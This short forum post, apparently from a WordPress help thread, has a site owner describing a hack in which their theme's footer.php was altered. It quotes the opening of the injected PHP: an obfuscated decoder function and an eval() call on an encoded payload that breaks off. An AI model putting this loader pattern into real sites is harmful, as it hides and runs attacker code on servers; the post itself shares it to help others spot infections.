I didn’t use SiteLock but I did seem to have been hacked with very similar code as the original post. I found that my theme’s footer.php had been modified and an eval() statement was put in.
This isn’t the full code but it starts like this:
<?php function nBMj($NrG)
{
$NrG=gzinflate(base64_decode($NrG));
for($i=0;$i<strlen($NrG);$i++)
{
$NrG[$i] = chr(ord($NrG[$i])-1);
}
return $NrG;
}eval(nBMj("nVgNc9o4E
In other words, it’s a fairly standard eval() injection type of attack…
